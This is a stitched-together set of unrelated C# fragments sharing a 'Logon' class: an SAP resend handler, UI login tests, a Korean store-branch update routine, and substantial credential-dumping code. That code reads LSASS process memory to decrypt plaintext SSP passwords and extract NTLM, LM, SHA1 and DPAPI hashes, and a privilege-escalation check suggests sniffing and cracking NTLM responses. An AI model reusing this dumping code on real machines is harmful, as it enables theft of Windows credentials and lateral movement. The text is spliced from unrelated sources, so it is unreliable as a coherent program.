logonsession.UserName = Utility.ExtractUnicodeStringString(hLsass, Utility.ExtractUnicodeString(hLsass, pUserName));
logonsession.LogonDomain = Utility.ExtractUnicodeStringString(hLsass, Utility.ExtractUnicodeString(hLsass, pLogonDomain));
logonsession.LogonServer = Utility.ExtractUnicodeStringString(hLsass, Utility.ExtractUnicodeString(hLsass, pLogonServer));
ConvertSidToStringSid(Utility.ExtractSid(hLsass, logonsession.pSid), out string stringSid);
Logon logon = new Logon(luid)
{
Session = logonsession.Session,
LogonType = KUHL_M_SEKURLSA_LOGON_TYPE[logonsession.LogonType],
LogonTime = logonsession.LogonTime,
UserName = logonsession.UserName,
LogonDomain = logonsession.LogonDomain,
LogonServer = logonsession.LogonServer,
SID = stringSid,
pCredentials = logonsession.pCredentials,
pCredentialManager = logonsession.pCredentialManager
};
logonlist.Add(logon);
current = new IntPtr(Marshal.ReadInt64(listentry));
pinnedArray.Free();
} while (current != pList);
}
return(0);
}
/// <summary>
/// Отправить сообщение в сокет
/// </summary>
public void SendMessage(Logon msg) => SendMessageImpl(new ClientMsg {
logon = msg
});
protected void resend_Click(object sender, EventArgs e)
{
XmlDocument xmlDoc = new XmlDocument();
xmlDoc.LoadXml(txtFieldValue.Text);
XmlNodeList msglist = xmlDoc.SelectNodes("Form/FormFieldValue/FieldItem/FieldValue/Item/RETURNMSG");
foreach (XmlNode nd in msglist)
{
xmlDoc.SelectSingleNode("Form/FormFieldValue/FieldItem/FieldValue/Item").RemoveChild(xmlDoc.SelectSingleNode("Form/FormFieldValue/FieldItem/FieldValue/Item/RETURNMSG"));
}
Logon Con = new Logon();
string ZFLAG = "";
string ZMSG = "";
try
{
Con.Conncet(); //連接
Function fn = new Function();
fn.SetFunction("ZRFC006");
// fn.Field_SetValue("PURCHASEORDER", xmlDoc.SelectSingleNode("/Form/FormFieldValue/FieldItem/FieldValue").Attributes["PURCHASEORDER"].Value);
fn.Field_SetValue("ZRFCTYPE", "M");
fn.Field_SetValue("PSTNG_DATE", xmlDoc.SelectSingleNode("/Form/FormFieldValue/FieldItem/FieldValue").Attributes["PSTNG_DATE"].Value);
fn.Field_SetValue("DOC_DATE", xmlDoc.SelectSingleNode("/Form/FormFieldValue/FieldItem/FieldValue").Attributes["DOC_DATE"].Value);
fn.Field_SetValue("MOVE_TYPE", xmlDoc.SelectSingleNode("/Form/FormFieldValue/FieldItem/FieldValue").Attributes["MOVE_TYPE"].Value);
fn.Set_TableName("POITEM");
DataTable POITEM = new DataTable("POITEM");
POITEM.Columns.Add("ITEM");
POITEM.Columns.Add("value");
XmlNodeList ItemList = xmlDoc.SelectNodes("/Form/FormFieldValue/FieldItem/FieldValue/Item");
DataRow dr;
foreach (XmlNode node in ItemList)
{
POITEM.Rows.Clear();
XmlElement XE = (XmlElement)node;
XmlAttributeCollection xac = node.Attributes;
foreach (XmlAttribute xa in xac)
{
if (xa.Name != "key")
{
dr = POITEM.NewRow();
dr[0] = xa.Name;
dr[1] = xa.Value;
POITEM.Rows.Add(dr);
}
}
fn.Set_Table(POITEM);
}
fn.StartFunction();
ZFLAG = fn.Retrun_String("ZFLAG");
ZMSG = fn.Retrun_String("ZMSG");
}
finally
{
Con.dispose();
}
bool flag = false;
int ty = 0;
XmlElement fieldElement = xmlDoc.CreateElement("RETURNMSG");
switch (ZFLAG)
{
case "S":
fieldElement.SetAttribute("type", "成功");
ty = 1;
break;
case "W":
fieldElement.SetAttribute("type", "警告");
break;
case "E":
fieldElement.SetAttribute("type", "失敗");
ty = 0;
flag = true;
break;
}
fieldElement.SetAttribute("msg", ZMSG);
xmlDoc.SelectSingleNode("/Form/FormFieldValue/FieldItem/FieldValue/Item").InnerXml += fieldElement.OuterXml;
XmlNodeList last = xmlDoc.SelectNodes("/Form/FormFieldValue/FieldItem");
int lastcount = last.Count;
int xmllistcount = 1;
foreach (XmlNode nd in last)
{
if (xmllistcount == lastcount)
{
if (flag == true)
{
nd.Attributes["ConditionValue"].Value = "0";
}
else
{
nd.Attributes["ConditionValue"].Value = ty.ToString();
}
}
xmllistcount++;
}
string txt = (ty == 1) ? "成功" : "失敗";
PrivateMessageUCO msgUco = new PrivateMessageUCO();
string createUser = xmlDoc.SelectSingleNode("/Form/Applicant").Attributes["userGuid"].Value;
msgUco.SendOneNewMessage("admin", "採購單-收貨回傳資訊", txt, createUser);
PO_Receipt.UCO.UCO uco = new PO_Receipt.UCO.UCO();
msg ds = new msg();
//DataTable re = new DataTable();
msg.TB_WKF_TASKRow TASKRow = ds.TB_WKF_TASK.NewTB_WKF_TASKRow();
TASKRow.DOC_NBR = DOC_NBR;
TASKRow.CURRENT_DOC = xmlDoc.OuterXml;
uco.UpdateXmlsetMsg(TASKRow);
Response.Write("<script>alert('重送完成');location.href='" + Request.Url.AbsoluteUri + "';</script>");
}
public static int FindCredentials(IntPtr hLsass, IntPtr msvMem, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
{
KIWI_SSP_CREDENTIAL_LIST_ENTRY entry;
IntPtr sspCredentialListAddr;
IntPtr llCurrent;
string passDecrypted = "";
sspCredentialListAddr = Utility.GetListAdress(hLsass, msvMem, "msv1_0.dll", max_search_size, oshelper.CREDENTIALLISTOFFSET, oshelper.SspCredentialListSign);
//Console.WriteLine("[*] Ssp SspCredentialList found at address {0:X}", sspCredentialListAddr.ToInt64());
llCurrent = sspCredentialListAddr;
do
{
byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, llCurrent, Marshal.SizeOf(typeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY)));
entry = Utility.ReadStruct <KIWI_SSP_CREDENTIAL_LIST_ENTRY>(entryBytes);
string username = Utility.ExtractUnicodeStringString(hLsass, entry.credentials.UserName);
string domain = Utility.ExtractUnicodeStringString(hLsass, entry.credentials.Domaine);
int reference = (int)entry.References;
byte[] msvPasswordBytes = Utility.ReadFromLsass(ref hLsass, entry.credentials.Password.Buffer, entry.credentials.Password.MaximumLength);
byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, iv, aeskey, deskey);
passDecrypted = Encoding.Unicode.GetString(msvDecryptedPasswordBytes);
/*Console.WriteLine("LUID " + entry.LogonId.LowPart);
* Console.WriteLine("References " + entry.References);
* Console.WriteLine("CredentialReferences " + entry.CredentialReferences);
* Console.WriteLine("Uusername {1} {0}", username, entry.credentials.UserName.MaximumLength);
* Console.WriteLine("Udomain {1} {0}", domain, entry.credentials.Domaine.MaximumLength);
* Console.WriteLine("Upassword {1} {0}", passDecrypted, entry.credentials.Password.MaximumLength);*/
if (!string.IsNullOrEmpty(username) && username.Length > 1)
{
LUID luid = entry.LogonId;
Credential.Ssp sspentry = new Credential.Ssp();
sspentry.Reference = reference;
sspentry.UserName = username;
if (!string.IsNullOrEmpty(domain))
{
sspentry.DomainName = domain;
}
else
{
sspentry.DomainName = "[NULL]";
}
if (!string.IsNullOrEmpty(passDecrypted))
{
sspentry.Password = passDecrypted;
}
else
{
sspentry.Password = "******";
}
Logon currentlogon = logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
if (currentlogon == null)
{
currentlogon = new Logon(luid);
currentlogon.UserName = username;
currentlogon.Ssp = new List <Credential.Ssp>();
currentlogon.Ssp.Add(sspentry);
logonlist.Add(currentlogon);
}
else
{
if (currentlogon.Ssp == null)
{
currentlogon.Ssp = new List <Credential.Ssp>();
}
currentlogon.Ssp.Add(sspentry);
}
}
llCurrent = entry.Flink;
} while (llCurrent != sspCredentialListAddr);
return(0);
}
public static int FindCredentials(IntPtr hLsass, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
{
foreach (Logon logon in logonlist)
{
IntPtr lsasscred = logon.pCredentials;
LUID luid = logon.LogonId;
if (lsasscred != IntPtr.Zero)
{
Msv msventry = new Msv();
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
while (lsasscred != IntPtr.Zero)
{
byte[] credentialsBytes = Utility.ReadFromLsass(ref hLsass, lsasscred, Marshal.SizeOf(typeof(KIWI_MSV1_0_CREDENTIALS)));
IntPtr pPrimaryCredentials = new IntPtr(BitConverter.ToInt64(credentialsBytes, Utility.FieldOffset <KIWI_MSV1_0_CREDENTIALS>("PrimaryCredentials")));
IntPtr pNext = new IntPtr(BitConverter.ToInt64(credentialsBytes, Utility.FieldOffset <KIWI_MSV1_0_CREDENTIALS>("next")));
lsasscred = pPrimaryCredentials;
while (lsasscred != IntPtr.Zero)
{
byte[] primaryCredentialsBytes = Utility.ReadFromLsass(ref hLsass, lsasscred, Marshal.SizeOf(typeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)));
primaryCredentials = Utility.ReadStruct <KIWI_MSV1_0_PRIMARY_CREDENTIALS>(primaryCredentialsBytes);
primaryCredentials.Credentials = Utility.ExtractUnicodeString(hLsass, IntPtr.Add(lsasscred, oshelper.MSV1CredentialsOffset));
primaryCredentials.Primary = Utility.ExtractUnicodeString(hLsass, IntPtr.Add(lsasscred, oshelper.MSV1PrimaryOffset));
if (Utility.ExtractANSIStringString(hLsass, primaryCredentials.Primary).Equals("Primary"))
{
byte[] msvCredentialsBytes = Utility.ReadFromLsass(ref hLsass, primaryCredentials.Credentials.Buffer, primaryCredentials.Credentials.MaximumLength);
byte[] msvDecryptedCredentialsBytes = BCrypt.DecryptCredentials(msvCredentialsBytes, iv, aeskey, deskey);
UNICODE_STRING usLogonDomainName = Utility.ReadStruct <UNICODE_STRING>(Utility.GetBytes(msvDecryptedCredentialsBytes, oshelper.LogonDomainNameOffset, Marshal.SizeOf(typeof(UNICODE_STRING))));
UNICODE_STRING usUserName = Utility.ReadStruct <UNICODE_STRING>(Utility.GetBytes(msvDecryptedCredentialsBytes, oshelper.UserNameOffset, Marshal.SizeOf(typeof(UNICODE_STRING))));
msventry = new Msv();
msventry.DomainName = Encoding.Unicode.GetString(Utility.GetBytes(msvDecryptedCredentialsBytes, usLogonDomainName.Buffer.ToInt64(), usLogonDomainName.Length));
msventry.UserName = Encoding.Unicode.GetString(Utility.GetBytes(msvDecryptedCredentialsBytes, usUserName.Buffer.ToInt64(), usUserName.Length));
msventry.Lm = Utility.PrintHashBytes(Utility.GetBytes(msvDecryptedCredentialsBytes, oshelper.LmOwfPasswordOffset, LM_NTLM_HASH_LENGTH));
msventry.Ntlm = Utility.PrintHashBytes(Utility.GetBytes(msvDecryptedCredentialsBytes, oshelper.NtOwfPasswordOffset, LM_NTLM_HASH_LENGTH));
msventry.Sha1 = Utility.PrintHashBytes(Utility.GetBytes(msvDecryptedCredentialsBytes, oshelper.ShaOwPasswordOffset, SHA_DIGEST_LENGTH));
msventry.Dpapi = Utility.PrintHashBytes(Utility.GetBytes(msvDecryptedCredentialsBytes, oshelper.DPAPIProtectedOffset, LM_NTLM_HASH_LENGTH));
Logon currentlogon = logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
if (currentlogon == null)
{
Console.WriteLine("[x] Something goes wrong");
}
else
{
currentlogon.Msv = msventry;
}
}
lsasscred = primaryCredentials.next;
}
lsasscred = pNext;
}
}
}
return(0);
}
public void ShouldBeAbleToLogon()
{
Logon.AsInternalUser();
ShouldBeTextPresent("task board");
}
public static ILogon CreateLogonObject()
{
ILogon objLogon = new Logon();
return(objLogon);
}
public void ShouldNotBeAbleToLogonWithADodgyUserId()
{
Logon.AsInternalUser("*****@*****.**", waitForLogin: false);
ShouldBeAlertContainingText("Your email address and/or password are incorrect");
ShouldNotBeTextPresent("Current tasks");
}
private static void PrintLogonEvents()
{
try
{
var lastDays = 10;
Beaprint.MainPrint($"Printing Account Logon Events (4624) for the last {lastDays} days.\n");
if (!MyUtils.IsHighIntegrity())
{
Beaprint.NoColorPrint(" You must be an administrator to run this check");
return;
}
var logonInfos = Logon.GetLogonInfos(lastDays);
foreach (var info in logonInfos.LogonEventInfos)
{
Beaprint.BadPrint($" Subject User Name : {info.SubjectUserName}\n" +
$" Subject Domain Name : {info.SubjectDomainName}\n" +
$" Created (Utc) : {info.CreatedAtUtc}\n" +
$" IP Address : {info.IpAddress}\n" +
$" Authentication Package : {info.AuthenticationPackage}\n" +
$" Lm Package : {info.LmPackage}\n" +
$" Logon Type : {info.LogonType}\n" +
$" Target User Name : {info.TargetUserName}\n" +
$" Target Domain Name : {info.TargetDomainName}\n" +
$" Target Outbound User Name : {info.TargetOutboundUserName}\n" +
$" Target Outbound Domain Name : {info.TargetOutboundDomainName}\n");
Beaprint.PrintLineSeparator();
}
if (logonInfos.NTLMv1LoggedUsersSet.Count > 0 || logonInfos.NTLMv2LoggedUsersSet.Count > 0)
{
Beaprint.BadPrint(" NTLM relay might be possible - other users authenticate to this machine using NTLM!");
}
if (logonInfos.NTLMv1LoggedUsersSet.Count > 0)
{
Beaprint.BadPrint(" Accounts authenticate to this machine using NTLM v1!");
Beaprint.BadPrint(" You can obtain these accounts' **NTLM** hashes by sniffing NTLM challenge/responses and then crack them!");
Beaprint.BadPrint(" NTLM v1 authentication is broken!\n");
PrintUsers(logonInfos.NTLMv1LoggedUsersSet);
}
if (logonInfos.NTLMv2LoggedUsersSet.Count > 0)
{
Beaprint.BadPrint("\n Accounts authenticate to this machine using NTLM v2!");
Beaprint.BadPrint(" You can obtain NetNTLMv2 for these accounts by sniffing NTLM challenge/responses.");
Beaprint.BadPrint(" You can then try and crack their passwords.\n");
PrintUsers(logonInfos.NTLMv2LoggedUsersSet);
}
if (logonInfos.KerberosLoggedUsersSet.Count > 0)
{
Beaprint.BadPrint("\n The following users have authenticated to this machine using Kerberos.\n");
PrintUsers(logonInfos.KerberosLoggedUsersSet);
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
private void updatebranch()
{
ResultBox rtnbox = new ResultBox();
try
{
string a_branch_id = (jsonCol["a_branch_id"] != null) ? jsonCol["a_branch_id"].GetValue().ToString() : "";
string a_branch_nm = (jsonCol["a_branch_nm"] != null) ? jsonCol["a_branch_nm"].GetValue().ToString() : "";
string a_branch_tel = (jsonCol["a_branch_tel"] != null) ? jsonCol["a_branch_tel"].GetValue().ToString() : "";
string a_branch_addr = (jsonCol["a_branch_addr"] != null) ? jsonCol["a_branch_addr"].GetValue().ToString() : "";
string mid = (jsonCol["mid"] != null) ? jsonCol["mid"].GetValue().ToString() : "";
string mertkey = (jsonCol["mertkey"] != null) ? jsonCol["mertkey"].GetValue().ToString() : "";
string ocb_branch_id = (jsonCol["ocb_branch_id"] != null) ? jsonCol["ocb_branch_id"].GetValue().ToString() : "";
string ocb_branch_cn = (jsonCol["ocb_branch_cn"] != null) ? jsonCol["ocb_branch_cn"].GetValue().ToString() : "";
string home_yn = (jsonCol["home_yn"] != null) ? jsonCol["home_yn"].GetValue().ToString() : "N";
string online_yn = (jsonCol["online_yn"] != null) ? jsonCol["online_yn"].GetValue().ToString() : "N";
string ecoupon_yn = (jsonCol["ecoupon_yn"] != null) ? jsonCol["ecoupon_yn"].GetValue().ToString() : "N";
string cesco_yn = (jsonCol["cesco_yn"] != null) ? jsonCol["cesco_yn"].GetValue().ToString() : "N";
string carddisc_yn = (jsonCol["carddisc_yn"] != null) ? jsonCol["carddisc_yn"].GetValue().ToString() : "N";
string bctop_yn = (jsonCol["bctop_yn"] != null) ? jsonCol["bctop_yn"].GetValue().ToString() : "N";
string advance_yn = (jsonCol["advance_yn"] != null) ? jsonCol["advance_yn"].GetValue().ToString() : "N";
string packing = (jsonCol["packing"] != null) ? jsonCol["packing"].GetValue().ToString() : "P1";
string lat = (jsonCol["lat"] != null) ? jsonCol["lat"].GetValue().ToString() : "";
string lng = (jsonCol["lng"] != null) ? jsonCol["lng"].GetValue().ToString() : "";
string use_yn = (jsonCol["use_yn"] != null) ? jsonCol["use_yn"].GetValue().ToString() : "N";
string onyn = (jsonCol["onyn"] != null) ? jsonCol["onyn"].GetValue().ToString() : "";
string epyn = (jsonCol["epyn"] != null) ? jsonCol["epyn"].GetValue().ToString() : "";
string adyn = (jsonCol["adyn"] != null) ? jsonCol["adyn"].GetValue().ToString() : "";
string bcyn = (jsonCol["bcyn"] != null) ? jsonCol["bcyn"].GetValue().ToString() : "";
string agent_id = base.logOnInfo.UserId.ToString();
string agent_nm = base.logOnInfo.UserName.ToString();
#region 관리자 정보 조회
DataSet ds = new DataSet();
Logon logon = new Logon();
Hashtable adinfo_param = new Hashtable();
adinfo_param.Add("uno", agent_id);
ds = logon.selectAdminInfo(adinfo_param);
string uid = ds.Tables[0].Rows[0]["UID"].ToString();
History history = new History();
#endregion
if (online_yn != onyn)
{
Hashtable param = new Hashtable();
param.Add("uid", uid);
param.Add("user_name", agent_nm);
param.Add("online_yn", online_yn);
param.Add("br_code", a_branch_id);
history.insertOnlineYnHistory(param);
}
if (ecoupon_yn != epyn)
{
Hashtable param = new Hashtable();
param.Add("uid", uid);
param.Add("user_name", agent_nm);
param.Add("ecoupon_yn", ecoupon_yn);
param.Add("br_code", a_branch_id);
history.insertEcouponYnHistory(param);
}
if (advance_yn != adyn)
{
Hashtable param = new Hashtable();
param.Add("uid", uid);
param.Add("user_name", agent_nm);
param.Add("advance_yn", advance_yn);
param.Add("br_code", a_branch_id);
history.insertAdvanceYnHistory(param);
}
if (bctop_yn != bcyn)
{
Hashtable param = new Hashtable();
param.Add("uid", uid);
param.Add("user_name", agent_nm);
param.Add("bctop_yn", bctop_yn);
param.Add("br_code", a_branch_id);
history.insertBctopYnHistory(param);
}
string agent_ip = Request.ServerVariables["REMOTE_ADDR"];
string actionmode = "updatebranch";
if (a_branch_id == "" || a_branch_id == null)
{
result.Add(new JsonStringValue("result", "159"));
result.Add(new JsonStringValue("message", "매장아이디가 존재하지 않습니다.\\n잠시 후 다시 이욯해 주세요."));
}
else
{
Hashtable param = new Hashtable();
param.Add("agent_id", agent_id);
param.Add("agent_nm", agent_nm);
param.Add("agent_ip", agent_ip);
param.Add("actionmode", actionmode);
param.Add("a_branch_id", a_branch_id);
param.Add("a_branch_nm", a_branch_nm);
param.Add("a_branch_tel", a_branch_tel);
param.Add("a_branch_addr", a_branch_addr);
param.Add("mid", mid);
param.Add("mertkey", mertkey);
param.Add("ocb_branch_id", ocb_branch_id);
param.Add("ocb_branch_cn", ocb_branch_cn);
param.Add("home_yn", home_yn);
param.Add("online_yn", online_yn);
param.Add("ecoupon_yn", ecoupon_yn);
param.Add("cesco_yn", cesco_yn);
param.Add("carddisc_yn", carddisc_yn);
param.Add("bctop_yn", bctop_yn);
param.Add("advance_yn", advance_yn);
param.Add("packing_type", packing);
param.Add("lat", lat);
param.Add("lng", lng);
param.Add("use_yn", use_yn);
rtnbox = store.updateBranch(param);
result.Add(new JsonStringValue("result", rtnbox.ResultCode));
result.Add(new JsonStringValue("message", rtnbox.ResultMsg));
}
}
catch (Exception ex)
{
result.Add(new JsonStringValue("result", "155"));
result.Add(new JsonStringValue("message", "매장업데이트 진행시 예외오류가 발생하였습니다.\\n" + ex.Message));
}
}
